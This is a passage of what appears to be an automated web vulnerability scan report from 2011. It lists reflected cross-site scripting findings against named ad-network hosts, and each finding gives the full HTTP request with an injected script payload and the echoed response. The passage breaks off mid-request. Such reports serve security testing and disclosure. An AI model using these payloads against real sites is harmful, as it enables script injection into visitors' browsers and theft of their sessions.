FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Expires: Mon, 14 Feb 2011 01:26:34 GMT
Date: Mon, 14 Feb 2011 01:25:57 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fmr.js;qs=79b5f'-alert(1)-'606f1eb024=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

1.158. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c98b'%3balert(1)//05ebf60c76b was submitted in the q parameter. This input was echoed as 5c98b';alert(1)//05ebf60c76b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=5c98b'%3balert(1)//05ebf60c76b&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:14:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:56 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='5c98b';alert(1)//05ebf60c76b';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=5c98b';alert(1)//05ebf60c76b;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

1.159. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a24e"%3balert(1)//78bd77ef7b2 was submitted in the q parameter. This input was echoed as 4a24e";alert(1)//78bd77ef7b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=4a24e"%3balert(1)//78bd77ef7b2&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:14:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:56 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='4a24e";alert(1)//78bd77ef7b2';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=4a24e";alert(1)//78bd77ef7b2;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.160. http://dev.inskinmedia.com/trackports/rep/base/track.php [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dev.inskinmedia.com
Path:	/trackports/rep/base/track.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 15067<script>alert(1)</script>559c6769366 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackports/rep/base/track.php?callback=jsonp129764733685915067<script>alert(1)</script>559c6769366&type=init&section_id=124015&content_type=PAGE&page_url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&failed=0&reason=&version=31 HTTP/1.1
Host: dev.inskinmedia.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Content-type: text/html
Date: Mon, 14 Feb 2011 01:40:07 GMT
Server: lighttpd/1.4.19
Content-Length: 66

jsonp129764733685915067<script>alert(1)</script>559c6769366(null);

1.161. http://dev.inskinmedia.com/trackports/rep/base/track.php [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dev.inskinmedia.com
Path:	/trackports/rep/base/track.php

Issue detail

The value of the type request parameter is copied into the HTML document as plain text between tags. The payload bdd5a<script>alert(1)</script>01f935525e0 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackports/rep/base/track.php?callback=jsonp1297647336859&type=initbdd5a<script>alert(1)</script>01f935525e0&section_id=124015&content_type=PAGE&page_url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&failed=0&reason=&version=31 HTTP/1.1
Host: dev.inskinmedia.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Content-type: text/html
Date: Mon, 14 Feb 2011 01:40:08 GMT
Server: lighttpd/1.4.19
Content-Length: 75

Error: type "initbdd5a<script>alert(1)</script>01f935525e0" not recognized.

1.162. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11355486136@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a742"><script>alert(1)</script>37cfb750f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM6a742"><script>alert(1)</script>37cfb750f3/2010DM/11355486136@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM6a742"><script>alert(1)</script>37cfb750f3/2010DM/1783083111/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.163. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11355486136@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd26f"><script>alert(1)</script>86e816e9a4d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMfd26f"><script>alert(1)</script>86e816e9a4d/11355486136@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMfd26f"><script>alert(1)</script>86e816e9a4d/114049446/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.164. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11355486136@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e1a"><script>alert(1)</script>f19825639fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11355486136@x2349e1a"><script>alert(1)</script>f19825639fa?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1477922344/x2349e1a"><script>alert(1)</script>f19825639fa/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.165. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11473307965@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a745b"><script>alert(1)</script>050408e5f6b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMa745b"><script>alert(1)</script>050408e5f6b/2010DM/11473307965@x23?USNetwork/RS_SELL_2011Q1_TF_CT_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aOmNvBpGrwptrC5qvh3Wmt4AFZcmbMK0G3VXGYVXVZbNnEvV3FMPVFbAUP72Qq32SV3MQdJs0dBsWmnu2sB5XrUZaVmPw4mQ9R6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvuWoguA/2401336/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380; session=1297647384|1297647384; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMa745b"><script>alert(1)</script>050408e5f6b/2010DM/1959021525/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.166. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11473307965@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e244"><script>alert(1)</script>5324050ac37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM1e244"><script>alert(1)</script>5324050ac37/11473307965@x23?USNetwork/RS_SELL_2011Q1_TF_CT_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aOmNvBpGrwptrC5qvh3Wmt4AFZcmbMK0G3VXGYVXVZbNnEvV3FMPVFbAUP72Qq32SV3MQdJs0dBsWmnu2sB5XrUZaVmPw4mQ9R6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvuWoguA/2401336/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380; session=1297647384|1297647384; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM1e244"><script>alert(1)</script>5324050ac37/1110964581/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.167. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11473307965@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1f2c"><script>alert(1)</script>d093f0af15f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11473307965@x23f1f2c"><script>alert(1)</script>d093f0af15f?USNetwork/RS_SELL_2011Q1_TF_CT_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
